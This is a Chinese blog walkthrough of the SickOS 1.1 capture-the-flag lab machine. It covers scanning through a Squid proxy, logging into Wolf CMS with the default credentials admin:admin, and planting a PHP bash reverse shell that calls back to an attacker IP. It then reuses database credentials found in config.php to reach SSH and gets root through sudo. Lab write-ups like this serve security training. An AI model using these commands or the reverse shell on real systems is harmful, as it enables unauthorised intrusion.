sickos1.1靶机攻略

sickos

扫描阶段

传统两件套扫描

arp-scan -l

nmap -sV -A -p- 10.4.7.134

结果如图

image-20231012220649028

开放22ssh,3128tcp 关闭8080

挨个尝试访问,只有3128端口有个错误页

image-20231012220752380

重新查看3128的扫描结果

3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

上网查询该squid服务为代理服务

在man命令下的帮助下即可进行目录扫描了

dirsearch -u http://10.4.7.134 --proxy http://10.4.7.134:3128

dirb http://10.4.7.134 -p http://10.4.7.134:3128

image-20231012222023932

image-20231012222033560

二者扫描结果如图,尝试进行访问

渗透

如图添加代理

image-20231012223125658
在这里插入图片描述

再次访问主页,发现内容

在这里插入图片描述

发现没用,接着探查

image-20231012223306548

发现内容/wolfcms,尝试访问

image-20231012223705396

上网搜索一波相关内容,甚至发现了相关cve

image-20231013143909206

在这里插入图片描述

发现admin后台页进入

http://10.4.7.134/wolfcms/?/admin/login

image-20231012224954775

至此处毫无有效信息,只能盲猜传统密码了

最后发现账号密码都为admin

admin:admin

image-20231012225323434

探查一番发现文件上传地方,此处上传个小马

但是发现没法执行该php文件,只能换个方式

此处将小马的内容写进其中一页里面去

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.4.7.130/12138 0>&1'"); ?>

image-20231012225833964

发现在这写弹不进去,再换一个地方写

image-20231012230131574

保存过后点击放大镜便执行了小马

成功反弹进去

image-20231012230317881

进去过后unmae -a,whoami,id,sudo -l,find都试了试没啥用,最后看看文件里有啥东西,结果发现当前目录下有config.php文件

image-20231013112639913

查看发现账号信息

image-20231013112750659

root
john@123

image-20231013115616263

查看passwd文件看看有哪些用户,此处发现和root一样是/bin/bash的有两个,但是考虑www-data也可以登录,所有/bin/sh的也考虑尝试

经过尝试发现sickos可以登录ssh

image-20231013140216448

提权

id可以发现该用户可以用sudo命令

随后使用sudo提权成功

sudo -l
sudo su root

image-20231013140329610

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值